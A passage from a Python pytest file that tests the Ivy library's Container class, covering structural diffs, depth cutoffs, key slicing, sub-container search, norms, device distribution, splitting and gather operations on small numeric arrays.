assert np.equal(ivy.to_numpy(container_diff.b.d), np.array([3]))
container_diff_diff_only = ivy.Container.structural_diff(
container_0, container_1, mode="diff_only"
)
assert "a" not in container_diff_diff_only
assert "b" in container_diff_diff_only
assert "c" in container_diff_diff_only["b"]
assert "d" not in container_diff_diff_only["b"]
container_diff_same_only = ivy.Container.structural_diff(
container_0, container_1, mode="same_only"
)
assert "a" in container_diff_same_only
assert "b" in container_diff_same_only
assert "c" not in container_diff_same_only["b"]
assert "d" in container_diff_same_only["b"]
# all different keys
container_0 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_1 = Container(
{
"e": ivy.array([4], device=device),
"f": {
"g": ivy.array([5], device=device),
"h": ivy.array([6], device=device),
},
}
)
container_diff = ivy.Container.structural_diff(container_0, container_1)
assert np.equal(ivy.to_numpy(container_diff.a.diff_0), np.array([1]))
assert np.equal(ivy.to_numpy(container_diff.b.diff_0.c), np.array([2]))
assert np.equal(ivy.to_numpy(container_diff.b.diff_0.d), np.array([3]))
assert np.equal(ivy.to_numpy(container_diff.e.diff_1), np.array([4]))
assert np.equal(ivy.to_numpy(container_diff.f.diff_1.g), np.array([5]))
assert np.equal(ivy.to_numpy(container_diff.f.diff_1.h), np.array([6]))
container_diff_diff_only = ivy.Container.structural_diff(
container_0, container_1, mode="diff_only"
)
assert container_diff_diff_only.to_dict() == container_diff.to_dict()
container_diff_same_only = ivy.Container.structural_diff(
container_0, container_1, mode="same_only"
)
assert container_diff_same_only.to_dict() == {}
# some different keys
container_0 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_1 = Container(
{
"a": ivy.array([4], device=device),
"b": {
"c": ivy.array([5], device=device),
"e": ivy.array([6], device=device),
},
}
)
container_diff = ivy.Container.structural_diff(container_0, container_1)
assert np.equal(ivy.to_numpy(container_diff.a), np.array([1]))
assert np.equal(ivy.to_numpy(container_diff.b.c), np.array([2]))
assert np.equal(ivy.to_numpy(container_diff.b.d.diff_0), np.array([3]))
assert np.equal(ivy.to_numpy(container_diff.b.e.diff_1), np.array([6]))
container_diff_diff_only = ivy.Container.structural_diff(
container_0, container_1, mode="diff_only"
)
assert "a" not in container_diff_diff_only
assert "b" in container_diff_diff_only
assert "c" not in container_diff_diff_only["b"]
assert "d" in container_diff_diff_only["b"]
assert "e" in container_diff_diff_only["b"]
container_diff_same_only = ivy.Container.structural_diff(
container_0, container_1, mode="same_only"
)
assert "a" in container_diff_same_only
assert "b" in container_diff_same_only
assert "c" in container_diff_same_only["b"]
assert "d" not in container_diff_same_only["b"]
assert "e" not in container_diff_same_only["b"]
# all same
container_0 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_1 = Container(
{
"a": ivy.array([4], device=device),
"b": {
"c": ivy.array([5], device=device),
"d": ivy.array([6], device=device),
},
}
)
container_diff = ivy.Container.structural_diff(container_0, container_1)
assert np.equal(ivy.to_numpy(container_diff.a), np.array([1]))
assert np.equal(ivy.to_numpy(container_diff.b.c), np.array([2]))
assert np.equal(ivy.to_numpy(container_diff.b.d), np.array([3]))
container_diff_diff_only = ivy.Container.structural_diff(
container_0, container_1, mode="diff_only"
)
assert container_diff_diff_only.to_dict() == {}
container_diff_same_only = ivy.Container.structural_diff(
container_0, container_1, mode="same_only"
)
assert container_diff_same_only.to_dict() == container_diff.to_dict()
def test_container_from_dict(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
container = Container(dict_in)
assert np.allclose(ivy.to_numpy(container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container.a), np.array([1]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([2]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([3]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([3]))
def test_container_depth(device, call):
cont_depth1 = Container(
{"a": ivy.array([1], device=device), "b": ivy.array([2], device=device)}
)
assert cont_depth1.max_depth == 1
cont_depth2 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
assert cont_depth2.max_depth == 2
cont_depth3 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": {"d": ivy.array([2], device=device)},
"e": ivy.array([3], device=device),
},
}
)
assert cont_depth3.max_depth == 3
cont_depth4 = Container(
{
"a": ivy.array([1], device=device),
"b": {"c": {"d": {"e": ivy.array([2], device=device)}}},
}
)
assert cont_depth4.max_depth == 4
@pytest.mark.parametrize("inplace", [True, False])
def test_container_cutoff_at_depth(inplace, device, call):
# values
a_val = ivy.array([1], device=device)
bcde_val = ivy.array([2], device=device)
# depth 1
cont = Container({"a": a_val, "b": {"c": {"d": {"e": bcde_val}}}})
cont_cutoff = cont.cutoff_at_depth(1, inplace=inplace)
if inplace:
cont_cutoff = cont
assert np.allclose(ivy.to_numpy(cont_cutoff.a), ivy.to_numpy(a_val))
assert not cont_cutoff.b
# depth 2
cont = Container({"a": a_val, "b": {"c": {"d": {"e": bcde_val}}}})
cont_cutoff = cont.cutoff_at_depth(2, inplace=inplace)
if inplace:
cont_cutoff = cont
assert np.allclose(ivy.to_numpy(cont_cutoff.a), ivy.to_numpy(a_val))
assert not cont_cutoff.b.c
# depth 3
cont = Container({"a": a_val, "b": {"c": {"d": {"e": bcde_val}}}})
cont_cutoff = cont.cutoff_at_depth(3, inplace=inplace)
if inplace:
cont_cutoff = cont
assert np.allclose(ivy.to_numpy(cont_cutoff.a), ivy.to_numpy(a_val))
assert not cont_cutoff.b.c.d
# depth 4
cont = Container({"a": a_val, "b": {"c": {"d": {"e": bcde_val}}}})
cont_cutoff = cont.cutoff_at_depth(4, inplace=inplace)
if inplace:
cont_cutoff = cont
assert np.allclose(ivy.to_numpy(cont_cutoff.a), ivy.to_numpy(a_val))
assert np.allclose(ivy.to_numpy(cont_cutoff.b.c.d.e), ivy.to_numpy(bcde_val))
@pytest.mark.parametrize("inplace", [True, False])
def test_container_cutoff_at_height(inplace, device, call):
# values
d_val = ivy.array([2], device=device)
e_val = ivy.array([3], device=device)
# height 0
cont = Container({"a": {"c": {"d": d_val}}, "b": {"c": {"d": {"e": e_val}}}})
cont_cutoff = cont.cutoff_at_height(0, inplace=inplace)
if inplace:
cont_cutoff = cont
assert np.allclose(ivy.to_numpy(cont_cutoff.a.c.d), ivy.to_numpy(d_val))
assert np.allclose(ivy.to_numpy(cont_cutoff.b.c.d.e), ivy.to_numpy(e_val))
# height 1
cont = Container({"a": {"c": {"d": d_val}}, "b": {"c": {"d": {"e": e_val}}}})
cont_cutoff = cont.cutoff_at_height(1, inplace=inplace)
if inplace:
cont_cutoff = cont
assert not cont_cutoff.a.c
assert not cont_cutoff.b.c.d
# height 2
cont = Container({"a": {"c": {"d": d_val}}, "b": {"c": {"d": {"e": e_val}}}})
cont_cutoff = cont.cutoff_at_height(2, inplace=inplace)
if inplace:
cont_cutoff = cont
assert not cont_cutoff.a
assert not cont_cutoff.b.c
# height 3
cont = Container({"a": {"c": {"d": d_val}}, "b": {"c": {"d": {"e": e_val}}}})
cont_cutoff = cont.cutoff_at_height(3, inplace=inplace)
if inplace:
cont_cutoff = cont
assert not cont_cutoff.a
assert not cont_cutoff.b
# height 4
cont = Container({"a": {"c": {"d": d_val}}, "b": {"c": {"d": {"e": e_val}}}})
cont_cutoff = cont.cutoff_at_height(4, inplace=inplace)
if inplace:
cont_cutoff = cont
assert not cont_cutoff
@pytest.mark.parametrize("str_slice", [True, False])
def test_container_slice_keys(str_slice, device, call):
# values
a_val = ivy.array([1], device=device)
b_val = ivy.array([2], device=device)
c_val = ivy.array([3], device=device)
d_val = ivy.array([4], device=device)
e_val = ivy.array([5], device=device)
# slice
if str_slice:
slc = "b:d"
else:
slc = slice(1, 4, 1)
# without dict
cont = Container({"a": a_val, "b": b_val, "c": c_val, "d": d_val, "e": e_val})
cont_sliced = cont.slice_keys(slc)
assert "a" not in cont_sliced
assert np.allclose(ivy.to_numpy(cont_sliced.b), ivy.to_numpy(b_val))
assert np.allclose(ivy.to_numpy(cont_sliced.c), ivy.to_numpy(c_val))
assert np.allclose(ivy.to_numpy(cont_sliced.d), ivy.to_numpy(d_val))
assert "e" not in cont_sliced
# with dict, depth 0
sub_cont = Container({"a": a_val, "b": b_val, "c": c_val, "d": d_val, "e": e_val})
cont = Container(
{"a": sub_cont, "b": sub_cont, "c": sub_cont, "d": sub_cont, "e": sub_cont}
)
cont_sliced = cont.slice_keys({0: slc})
assert "a" not in cont_sliced
assert Container.identical([cont_sliced.b, sub_cont])
assert Container.identical([cont_sliced.c, sub_cont])
assert Container.identical([cont_sliced.d, sub_cont])
assert "e" not in cont_sliced
# with dict, depth 1
sub_cont = Container({"a": a_val, "b": b_val, "c": c_val, "d": d_val, "e": e_val})
sub_sub_cont = Container({"b": b_val, "c": c_val, "d": d_val})
cont = Container(
{"a": sub_cont, "b": sub_cont, "c": sub_cont, "d": sub_cont, "e": sub_cont}
)
cont_sliced = cont.slice_keys({1: slc})
assert Container.identical([cont_sliced.a, sub_sub_cont])
assert Container.identical([cont_sliced.b, sub_sub_cont])
assert Container.identical([cont_sliced.c, sub_sub_cont])
assert Container.identical([cont_sliced.d, sub_sub_cont])
assert Container.identical([cont_sliced.e, sub_sub_cont])
# with dict, depth 0, 1
sub_cont = Container({"a": a_val, "b": b_val, "c": c_val, "d": d_val, "e": e_val})
sub_sub_cont = Container({"b": b_val, "c": c_val, "d": d_val})
cont = Container(
{"a": sub_cont, "b": sub_cont, "c": sub_cont, "d": sub_cont, "e": sub_cont}
)
cont_sliced = cont.slice_keys({0: slc, 1: slc})
assert "a" not in cont_sliced
assert Container.identical([cont_sliced.b, sub_sub_cont])
assert Container.identical([cont_sliced.c, sub_sub_cont])
assert Container.identical([cont_sliced.d, sub_sub_cont])
assert "e" not in cont_sliced
# all depths
sub_cont = Container({"a": a_val, "b": b_val, "c": c_val, "d": d_val, "e": e_val})
sub_sub_cont = Container({"b": b_val, "c": c_val, "d": d_val})
cont = Container(
{"a": sub_cont, "b": sub_cont, "c": sub_cont, "d": sub_cont, "e": sub_cont}
)
cont_sliced = cont.slice_keys(slc, all_depths=True)
assert "a" not in cont_sliced
assert Container.identical([cont_sliced.b, sub_sub_cont])
assert Container.identical([cont_sliced.c, sub_sub_cont])
assert Container.identical([cont_sliced.d, sub_sub_cont])
assert "e" not in cont_sliced
def test_container_show(device, call):
if call is helpers.mx_call:
# ToDo: get this working for mxnet again, recent version update caused errors.
pytest.skip()
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
cont = Container(dict_in)
print(cont)
cont.show()
def test_container_find_sub_container(device, call):
arr1 = ivy.array([1], device=device)
arr2 = ivy.array([2], device=device)
arr3 = ivy.array([3], device=device)
dict_in = {"a": arr1, "b": {"c": arr2, "d": arr3}}
top_cont = Container(dict_in)
# full
sub_cont = Container(dict_in["b"])
assert sub_cont in top_cont
found_kc = top_cont.find_sub_container(sub_cont)
assert found_kc == "b"
found_kc = top_cont.find_sub_container(top_cont)
assert found_kc == ""
# partial
partial_sub_cont = Container({"d": arr3})
found_kc = top_cont.find_sub_container(partial_sub_cont, partial=True)
assert found_kc == "b"
assert partial_sub_cont.find_sub_container(top_cont, partial=True) is False
partial_sub_cont = Container({"b": {"d": arr3}})
found_kc = top_cont.find_sub_container(partial_sub_cont, partial=True)
assert found_kc == ""
assert partial_sub_cont.find_sub_container(top_cont, partial=True) is False
def test_container_find_sub_structure(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
top_cont = Container(dict_in)
# full
sub_cont = Container(
{"c": ivy.array([4], device=device), "d": ivy.array([5], device=device)}
)
assert not top_cont.find_sub_container(sub_cont)
found_kc = top_cont.find_sub_structure(sub_cont)
assert found_kc == "b"
found_kc = top_cont.find_sub_structure(top_cont)
assert found_kc == ""
# partial
partial_sub_cont = Container({"d": ivy.array([5], device=device)})
found_kc = top_cont.find_sub_structure(partial_sub_cont, partial=True)
assert found_kc == "b"
partial_sub_cont = Container({"b": {"d": ivy.array([5], device=device)}})
found_kc = top_cont.find_sub_structure(partial_sub_cont, partial=True)
assert found_kc == ""
def test_container_show_sub_container(device, call):
if call is helpers.mx_call:
# ToDo: get this working for mxnet again, recent version update caused errors.
pytest.skip()
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
top_cont = Container(dict_in)
sub_cont = Container(dict_in["b"])
top_cont.show_sub_container("b")
top_cont.show_sub_container(sub_cont)
def test_container_from_dict_w_cont_types(device, call):
# ToDo: add tests for backends other than jax
if call is not helpers.jnp_call:
pytest.skip()
from haiku._src.data_structures import FlatMapping
dict_in = {
"a": ivy.array([1], device=device),
"b": FlatMapping(
{"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)}
),
}
container = Container(dict_in)
assert np.allclose(ivy.to_numpy(container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container.a), np.array([1]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([2]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([3]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([3]))
def test_container_from_kwargs(device, call):
container = Container(
a=ivy.array([1], device=device),
b={"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
)
assert np.allclose(ivy.to_numpy(container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container.a), np.array([1]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([2]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([3]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([3]))
def test_container_from_list(device, call):
list_in = [
ivy.array([1], device=device),
[ivy.array([2], device=device), ivy.array([3], device=device)],
]
container = Container(list_in, types_to_iteratively_nest=[list])
assert np.allclose(ivy.to_numpy(container["it_0"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container.it_0), np.array([1]))
assert np.allclose(ivy.to_numpy(container["it_1"]["it_0"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container.it_1.it_0), np.array([2]))
assert np.allclose(ivy.to_numpy(container["it_1"]["it_1"]), np.array([3]))
assert np.allclose(ivy.to_numpy(container.it_1.it_1), np.array([3]))
def test_container_from_tuple(device, call):
tuple_in = (
ivy.array([1], device=device),
(ivy.array([2], device=device), ivy.array([3], device=device)),
)
container = Container(tuple_in, types_to_iteratively_nest=[tuple])
assert np.allclose(ivy.to_numpy(container["it_0"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container.it_0), np.array([1]))
assert np.allclose(ivy.to_numpy(container["it_1"]["it_0"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container.it_1.it_0), np.array([2]))
assert np.allclose(ivy.to_numpy(container["it_1"]["it_1"]), np.array([3]))
assert np.allclose(ivy.to_numpy(container.it_1.it_1), np.array([3]))
def test_container_to_raw(device, call):
tuple_in = (
ivy.array([1], device=device),
(ivy.array([2], device=device), ivy.array([3], device=device)),
)
container = Container(tuple_in, types_to_iteratively_nest=[tuple])
raw = container.to_raw()
assert np.allclose(ivy.to_numpy(raw[0]), np.array([1]))
assert np.allclose(ivy.to_numpy(raw[1][0]), np.array([2]))
assert np.allclose(ivy.to_numpy(raw[1][1]), np.array([3]))
def test_container_clip_vector_norm(device, call):
container = Container({"a": ivy.array([[0.8, 2.2], [1.5, 0.2]], device=device)})
container_clipped = container.clip_vector_norm(2.5, 2.0)
assert np.allclose(
ivy.to_numpy(container_clipped["a"]),
np.array([[0.71749604, 1.9731141], [1.345305, 0.17937401]]),
)
assert np.allclose(
ivy.to_numpy(container_clipped.a),
np.array([[0.71749604, 1.9731141], [1.345305, 0.17937401]]),
)
def test_container_einsum(device, call):
dict_in = {
"a": ivy.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], device=device),
"b": {
"c": ivy.array([[2.0, 4.0], [6.0, 8.0], [10.0, 12.0]], device=device),
"d": ivy.array([[-2.0, -4.0], [-6.0, -8.0], [-10.0, -12.0]], device=device),
},
}
container = Container(dict_in)
container_einsummed = container.einsum("ij->i")
assert np.allclose(
ivy.to_numpy(container_einsummed["a"]), np.array([3.0, 7.0, 11.0])
)
assert np.allclose(ivy.to_numpy(container_einsummed.a), np.array([3.0, 7.0, 11.0]))
assert np.allclose(
ivy.to_numpy(container_einsummed["b"]["c"]), np.array([6.0, 14.0, 22.0])
)
assert np.allclose(
ivy.to_numpy(container_einsummed.b.c), np.array([6.0, 14.0, 22.0])
)
assert np.allclose(
ivy.to_numpy(container_einsummed["b"]["d"]), np.array([-6.0, -14.0, -22.0])
)
assert np.allclose(
ivy.to_numpy(container_einsummed.b.d), np.array([-6.0, -14.0, -22.0])
)
# def test_container_vector_norm(device, call):
# dict_in = {
# "a": ivy.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], device=device),
# "b": {
# "c": ivy.array([[2.0, 4.0], [6.0, 8.0], [10.0, 12.0]], device=device),
# "d": ivy.array([[3.0, 6.0], [9.0, 12.0], [15.0, 18.0]], device=device),
# },
# }
# container = Container(dict_in)
# container_normed = container.vector_norm(axis=(-1, -2))
# assert np.allclose(ivy.to_numpy(container_normed["a"]), 9.5394)
# assert np.allclose(ivy.to_numpy(container_normed.a), 9.5394)
# assert np.allclose(ivy.to_numpy(container_normed["b"]["c"]), 19.0788)
# assert np.allclose(ivy.to_numpy(container_normed.b.c), 19.0788)
# assert np.allclose(ivy.to_numpy(container_normed["b"]["d"]), 28.6182)
# assert np.allclose(ivy.to_numpy(container_normed.b.d), 28.6182)
def test_container_matrix_norm(device, call):
if call is helpers.mx_call:
# MXNet does not support matrix norm
pytest.skip()
dict_in = {
"a": ivy.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], device=device),
"b": {
"c": ivy.array([[2.0, 4.0], [6.0, 8.0], [10.0, 12.0]], device=device),
"d": ivy.array([[3.0, 6.0], [9.0, 12.0], [15.0, 18.0]], device=device),
},
}
container = Container(dict_in)
container_normed = container.matrix_norm()
assert np.allclose(ivy.to_numpy(container_normed["a"]), 9.52551809)
assert np.allclose(ivy.to_numpy(container_normed.a), 9.52551809)
assert np.allclose(ivy.to_numpy(container_normed["b"]["c"]), 19.05103618)
assert np.allclose(ivy.to_numpy(container_normed.b.c), 19.05103618)
assert np.allclose(ivy.to_numpy(container_normed["b"]["d"]), 28.57655427)
assert np.allclose(ivy.to_numpy(container_normed.b.d), 28.57655427)
def test_container_flip(device, call):
dict_in = {
"a": ivy.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], device=device),
"b": {
"c": ivy.array([[2.0, 4.0], [6.0, 8.0], [10.0, 12.0]], device=device),
"d": ivy.array([[-2.0, -4.0], [-6.0, -8.0], [-10.0, -12.0]], device=device),
},
}
container = Container(dict_in)
container_flipped = container.flip(-1)
assert np.allclose(
ivy.to_numpy(container_flipped["a"]),
np.array([[2.0, 1.0], [4.0, 3.0], [6.0, 5.0]]),
)
assert np.allclose(
ivy.to_numpy(container_flipped.a),
np.array([[2.0, 1.0], [4.0, 3.0], [6.0, 5.0]]),
)
assert np.allclose(
ivy.to_numpy(container_flipped["b"]["c"]),
np.array([[4.0, 2.0], [8.0, 6.0], [12.0, 10.0]]),
)
assert np.allclose(
ivy.to_numpy(container_flipped.b.c),
np.array([[4.0, 2.0], [8.0, 6.0], [12.0, 10.0]]),
)
assert np.allclose(
ivy.to_numpy(container_flipped["b"]["d"]),
np.array([[-4.0, -2.0], [-8.0, -6.0], [-12.0, -10.0]]),
)
assert np.allclose(
ivy.to_numpy(container_flipped.b.d),
np.array([[-4.0, -2.0], [-8.0, -6.0], [-12.0, -10.0]]),
)
def test_container_as_ones(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
container = Container(dict_in)
container_ones = container.as_ones()
assert np.allclose(ivy.to_numpy(container_ones["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container_ones.a), np.array([1]))
assert np.allclose(ivy.to_numpy(container_ones["b"]["c"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container_ones.b.c), np.array([1]))
assert np.allclose(ivy.to_numpy(container_ones["b"]["d"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container_ones.b.d), np.array([1]))
def test_container_as_zeros(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
container = Container(dict_in)
container_zeros = container.as_zeros()
assert np.allclose(ivy.to_numpy(container_zeros["a"]), np.array([0]))
assert np.allclose(ivy.to_numpy(container_zeros.a), np.array([0]))
assert np.allclose(ivy.to_numpy(container_zeros["b"]["c"]), np.array([0]))
assert np.allclose(ivy.to_numpy(container_zeros.b.c), np.array([0]))
assert np.allclose(ivy.to_numpy(container_zeros["b"]["d"]), np.array([0]))
assert np.allclose(ivy.to_numpy(container_zeros.b.d), np.array([0]))
def test_container_as_bools(device, call):
dict_in = {"a": ivy.array([1], device=device), "b": {"c": [], "d": True}}
container = Container(dict_in)
container_bools = container.as_bools()
assert container_bools["a"] is True
assert container_bools.a is True
assert container_bools["b"]["c"] is False
assert container_bools.b.c is False
assert container_bools["b"]["d"] is True
assert container_bools.b.d is True
def test_container_all_true(device, call):
assert not Container(
{"a": ivy.array([1], device=device), "b": {"c": [], "d": True}}
).all_true()
assert Container(
{"a": ivy.array([1], device=device), "b": {"c": [1], "d": True}}
).all_true()
# noinspection PyBroadException
try:
assert Container(
{"a": ivy.array([1], device=device), "b": {"c": [1], "d": True}}
).all_true(assert_is_bool=True)
error_raised = False
except AssertionError:
error_raised = True
assert error_raised
def test_container_all_false(device, call):
assert Container({"a": False, "b": {"c": [], "d": 0}}).all_false()
assert not Container({"a": False, "b": {"c": [1], "d": 0}}).all_false()
# noinspection PyBroadException
try:
assert Container(
{"a": ivy.array([1], device=device), "b": {"c": [1], "d": True}}
).all_false(assert_is_bool=True)
error_raised = False
except AssertionError:
error_raised = True
assert error_raised
def test_container_as_random_uniform(device, call):
dict_in = {
"a": ivy.array([1.0], device=device),
"b": {
"c": ivy.array([2.0], device=device),
"d": ivy.array([3.0], device=device),
},
}
container = Container(dict_in)
container_random = container.as_random_uniform()
assert (ivy.to_numpy(container_random["a"]) != np.array([1.0]))[0]
assert (ivy.to_numpy(container_random.a) != np.array([1.0]))[0]
assert (ivy.to_numpy(container_random["b"]["c"]) != np.array([2.0]))[0]
assert (ivy.to_numpy(container_random.b.c) != np.array([2.0]))[0]
assert (ivy.to_numpy(container_random["b"]["d"]) != np.array([3.0]))[0]
assert (ivy.to_numpy(container_random.b.d) != np.array([3.0]))[0]
def test_container_clone(device, call):
dict_in = {
"a": ivy.array([[1], [2], [3]], device=device),
"b": {
"c": ivy.array([[2], [3], [4]], device=device),
"d": ivy.array([[3], [4], [5]], device=device),
},
}
container = Container(dict_in)
# devices
devices = list()
device0 = device
devices.append(device0)
if "gpu" in device and ivy.num_gpus() > 1:
idx = ivy.num_gpus() - 1
device1 = device[:-1] + str(idx)
devices.append(device1)
# without key_chains specification
container_cloned = container.dev_clone(devices)
assert isinstance(container_cloned, ivy.DevClonedItem)
assert min([cont.dev_str == ds for ds, cont in container_cloned.items()])
assert ivy.Container.multi_map(
lambda xs, _: ivy.arrays_equal(xs), [c for c in container_cloned.values()]
).all_true()
@pytest.mark.parametrize("devs_as_dict", [True, False])
def test_container_distribute(devs_as_dict, device, call):
array_a = ivy.array([[1], [2], [3], [4]], device=device)
array_bc = ivy.array([[2], [3], [4], [5]], device=device)
array_bd = ivy.array([[3], [4], [5], [6]], device=device)
dict_in = {"a": array_a, "b": {"c": array_bc, "d": array_bd}}
container = Container(dict_in)
batch_size = array_a.shape[0]
if call is helpers.mx_call:
# MXNet does not support splitting along an axis with a remainder after division
pytest.skip()
# devices
dev0 = device
devices = [dev0]
if "gpu" in device and ivy.num_gpus() > 1:
idx = ivy.num_gpus() - 1
dev1 = device[:-1] + str(idx)
devices.append(dev1)
if devs_as_dict:
devices = dict(zip(devices, [int((1 / len(devices)) * 4)] * len(devices)))
num_devs = len(devices)
sub_size = int(batch_size / num_devs)
# without key_chains specification
container_dist = container.dev_dist(devices)
assert isinstance(container_dist, ivy.DevDistItem)
assert min([cont.dev_str == ds for ds, cont in container_dist.items()])
for i, sub_cont in enumerate(container_dist.values()):
assert np.array_equal(
ivy.to_numpy(sub_cont.a),
ivy.to_numpy(array_a)[i * sub_size : i * sub_size + sub_size],
)
assert np.array_equal(
ivy.to_numpy(sub_cont.b.c),
ivy.to_numpy(array_bc)[i * sub_size : i * sub_size + sub_size],
)
assert np.array_equal(
ivy.to_numpy(sub_cont.b.d),
ivy.to_numpy(array_bd)[i * sub_size : i * sub_size + sub_size],
)
def test_container_unstack(device, call):
dict_in = {
"a": ivy.array([[1], [2], [3]], device=device),
"b": {
"c": ivy.array([[2], [3], [4]], device=device),
"d": ivy.array([[3], [4], [5]], device=device),
},
}
container = Container(dict_in)
# without key_chains specification
container_unstacked = container.unstack(0)
for cont, a, bc, bd in zip(container_unstacked, [1, 2, 3], [2, 3, 4], [3, 4, 5]):
assert np.array_equal(ivy.to_numpy(cont["a"]), np.array([a]))
assert np.array_equal(ivy.to_numpy(cont.a), np.array([a]))
assert np.array_equal(ivy.to_numpy(cont["b"]["c"]), np.array([bc]))
assert np.array_equal(ivy.to_numpy(cont.b.c), np.array([bc]))
assert np.array_equal(ivy.to_numpy(cont["b"]["d"]), np.array([bd]))
assert np.array_equal(ivy.to_numpy(cont.b.d), np.array([bd]))
def test_container_split(device, call):
dict_in = {
"a": ivy.array([[1], [2], [3]], device=device),
"b": {
"c": ivy.array([[2], [3], [4]], device=device),
"d": ivy.array([[3], [4], [5]], device=device),
},
}
container = Container(dict_in)
# without key_chains specification
container_split = container.split(1, -1)
for cont, a, bc, bd in zip(container_split, [1, 2, 3], [2, 3, 4], [3, 4, 5]):
assert np.array_equal(ivy.to_numpy(cont["a"])[0], np.array([a]))
assert np.array_equal(ivy.to_numpy(cont.a)[0], np.array([a]))
assert np.array_equal(ivy.to_numpy(cont["b"]["c"])[0], np.array([bc]))
assert np.array_equal(ivy.to_numpy(cont.b.c)[0], np.array([bc]))
assert np.array_equal(ivy.to_numpy(cont["b"]["d"])[0], np.array([bd]))
assert np.array_equal(ivy.to_numpy(cont.b.d)[0], np.array([bd]))
def test_container_gather(device, call):
dict_in = {
"a": ivy.array([1, 2, 3, 4, 5, 6], device=device),
"b": {
"c": ivy.array([2, 3, 4, 5], device=device),
"d": ivy.array([10, 9, 8, 7, 6], device=device),
},
}
container = Container(dict_in)
# without key_chains specification
container_gathered = container.gather(ivy.array([1, 3], device=device))
assert np.allclose(ivy.to_numpy(container_gathered["a"]), np.array([2, 4]))
assert np.allclose(ivy.to_numpy(container_gathered.a), np.array([2, 4]))
assert np.allclose(ivy.to_numpy(container_gathered["b"]["c"]), np.array([3, 5]))
assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([3, 5]))
assert np.allclose(ivy.to_numpy(container_gathered["b"]["d"]), np.array([9, 7]))
assert np.allclose(ivy.to_numpy(container_gathered.b.d), np.array([9, 7]))
# with key_chains to apply
container_gathered = container.gather(
ivy.array([1, 3], device=device), -1, ["a", "b/c"]
)
assert np.allclose(ivy.to_numpy(container_gathered["a"]), np.array([2, 4]))
assert np.allclose(ivy.to_numpy(container_gathered.a), np.array([2, 4]))
assert np.allclose(ivy.to_numpy(container_gathered["b"]["c"]), np.array([3, 5]))
assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([3, 5]))
assert np.allclose(
ivy.to_numpy(container_gathered["b"]["d"]), np.array([10, 9, 8, 7, 6])
)
assert np.allclose(ivy.to_numpy(container_gathered.b.d), np.array([10, 9, 8, 7, 6]))
# with key_chains to apply pruned
container_gathered = container.gather(
ivy.array([1, 3], device=device), -1, ["a", "b/c"], prune_unapplied=True
)
assert np.allclose(ivy.to_numpy(container_gathered["a"]), np.array([2, 4]))
assert np.allclose(ivy.to_numpy(container_gathered.a), np.array([2, 4]))
assert np.allclose(ivy.to_numpy(container_gathered["b"]["c"]), np.array([3, 5]))
assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([3, 5]))
assert "b/d" not in container_gathered
# with key_chains to not apply
container_gathered = container.gather(
ivy.array([1, 3], device=device),
-1,
Container({"a": None, "b": {"d": None}}),
to_apply=False,
)
assert np.allclose(
ivy.to_numpy(container_gathered["a"]), np.array([1, 2, 3, 4, 5, 6])
)
assert np.allclose(ivy.to_numpy(container_gathered.a), np.array([1, 2, 3, 4, 5, 6]))
assert np.allclose(ivy.to_numpy(container_gathered["b"]["c"]), np.array([3, 5]))
assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([3, 5]))
assert np.allclose(
ivy.to_numpy(container_gathered["b"]["d"]), np.array([10, 9, 8, 7, 6])
)
assert np.allclose(ivy.to_numpy(container_gathered.b.d), np.array([10, 9, 8, 7, 6]))
# with key_chains to not apply pruned
container_gathered = container.gather(
ivy.array([1, 3], device=device),
-1,
Container({"a": None, "b": {"d": None}}),
to_apply=False,
prune_unapplied=True,
)
